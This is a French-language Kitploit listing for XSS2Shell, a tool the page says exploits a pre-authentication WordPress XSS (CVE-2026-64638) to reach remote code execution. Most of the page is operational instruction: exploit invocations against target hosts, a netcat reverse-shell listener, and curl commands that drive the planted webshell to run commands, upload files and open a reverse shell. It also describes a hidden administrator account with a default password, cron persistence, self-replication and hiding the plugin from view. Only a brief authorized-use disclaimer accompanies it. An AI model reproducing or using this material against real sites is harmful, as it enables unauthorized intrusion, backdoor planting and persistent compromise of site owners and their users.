Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
XSS2Shell — Exploite une XSS pré-authentification de WordPress (CVE-2026-64638) pour parvenir à une exécution de code à distance, en installant une webshell backdoor chiffrée en AES avec persistance, téléversement de fichiers, shell inversé et options de furtivité pour des engagements de red team autorisés. | Kitploit
Outils/GitHubGitHub/g0d150ne/xss2shell
Mécanismes de PersistanceExploitationExploitation d'Applications WebCollecte d'InformationsPost-ExploitationCommandement et ContrôleRed TeamingOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubg0d150ne/xss2shell

XSS2Shell

5il y a 29 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt

À propos

Exploite une XSS pré-authentification de WordPress (CVE-2026-64638) pour parvenir à une exécution de code à distance, en installant une webshell backdoor chiffrée en AES avec persistance, téléversement de fichiers, shell inversé et options de furtivité pour des engagements de red team autorisés.

Partager

XSS2Shell ULTIMATE v3.0

Chaîne d'exploitation XSS Pré-Auth WordPress → RCE
Développé par G0D150NE

📌 Fonctionnalités

  • 🔍 Détection automatique de XSS et de la version WordPress
  • 🎯 3 modes : Auto, XSS, Direct
  • 📡 Serveur de callback pour capturer les identifiants
  • 🐚 WebShell avec plusieurs méthodes d'exécution
  • 🔄 Persistance (tâche cron, admin caché, auto-réplication)
  • 📁 Téléversement/téléchargement de fichiers
  • 🖥️ Reverse shell en un clic
  • 🛡️ Mode furtif (masqué de la liste des plugins)
  • 🔐 Backdoor chiffrée AES-256

📦 Installation

root@kitploit:~
# Clone
git clone https://github.com/g0d150ne/XSS2Shell.git
cd XSS2Shell

# Install dependencies
pip3 install requests beautifulsoup4 cryptography

# Run
python3 poc.py -h

🚀 Démarrage rapide

1. Configuration du listener

root@kitploit:~
# Open terminal for reverse shell
nc -lvnp 4444

2. Exécuter l'exploit

Mode Auto (recommandé)

root@kitploit:~
python3 poc.py http://target.com -u admin -p pass123 --lhost 192.168.1.100

Mode XSS (sans identifiants)

root@kitploit:~
python3 poc.py http://target.com --mode xss --lhost 192.168.1.100

Mode Direct (avec identifiants)

root@kitploit:~
python3 poc.py http://target.com -u admin -p pass123 --mode direct --lhost 192.168.1.100

🔧 Exécution de commandes

Après installation du webshell :

root@kitploit:~
# Base64 encoded (recommended)
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?b2h='$(echo -n 'id' | base64)

# Plain command
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?cmd=whoami'

# Upload file
curl -F '[email protected]' http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php

# Reverse shell
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?rev=1'

🎯 Exemples d'utilisation

root@kitploit:~
# 1. Auto scan + exploit
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5

# 2. XSS chain without credentials
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5

# 3. Custom port & plugin name
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --lport 1337 --slug backdoor

# 4. Change backdoor password
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --backdoor-pass MySecretPass

# 5. Custom callback port
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5 --callback-port 9999

📝 Options de commande

OptionDescriptionDéfaut
targetURL WordPress cibleRequis
-u, --usernameNom d'utilisateur admin WordPress-
-p, --wp-passMot de passe admin WordPress-
--lhostAdresse IP du listener127.0.0.1
--lportPort du listener4444
--modeMode d'exploitation (auto/xss/direct)auto
--slugSlug du pluging0d150ne
--callback-portPort du serveur de callback9090
--backdoor-passMot de passe de la backdoorG0D150NE

🐚 Fonctionnalités du WebShell

Après une exploitation réussie :

FonctionnalitéCommande
Exécuter une commande?b2h=BASE64_CMD
Téléverser un fichier-F '[email protected]'
Reverse shell?rev=1
Commande en clair?cmd=id
Backdoor chiffrée?decrypt=AES_DATA

Admin caché créé :

  • Nom d'utilisateur : sysadmin_{slug}
  • Mot de passe : {backdoor-pass} (par défaut : G0D150NE)

📸 Exemple de sortie

root@kitploit:~
╔══════════════════════════════════════════════════════════════════╗
║  Target   : http://wordpress-site.com
║  Attacker : 192.168.1.100:4444
║  Plugin   : g0d150ne
║  Mode     : AUTO
╚══════════════════════════════════════════════════════════════════╝

[•] Detecting WordPress version...
[+] WordPress version: 6.7.0
[•] Testing XSS vulnerability...
[+] XSS vulnerable! Vector: <area id=ajaxurl...
[+] Login successful as admin
[+] Plugin uploaded successfully
[+] Webshell ready: http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php
[+] Test: uid=33(www-data)

╔══════════════════════════════════════════════════════════════════╗
║  [+] EXPLOIT SUCCESSFUL                                          ║
╠══════════════════════════════════════════════════════════════════╣
║  WEBSHELL:                                                       ║
║    http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php    ║
║  ADMIN USER CREATED:                                             ║
║    Username: sysadmin_g0d150ne                                   ║
║    Password: G0D150NE                                            ║
╚══════════════════════════════════════════════════════════════════╝

🔧 Dépannage

ProblèmeSolution
ModuleNotFoundErrorpip3 install requests beautifulsoup4 cryptography
Connection refusedVérifier le listener : nc -lvnp 4444
Login failedVérifier les identifiants ou utiliser le mode XSS
Plugin upload failedVérifier les permissions, utiliser un slug différent
Argument conflictUtiliser -p pour wp-pass, --backdoor-pass pour la backdoor

⚠️ Avertissement

Uniquement à des fins éducatives et de tests autorisés.
À utiliser uniquement sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation explicite de test.
L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage.

📞 Contact

  • Auteur : G0D150NE
  • CVE : CVE-2026-64638
Télécharger l’outil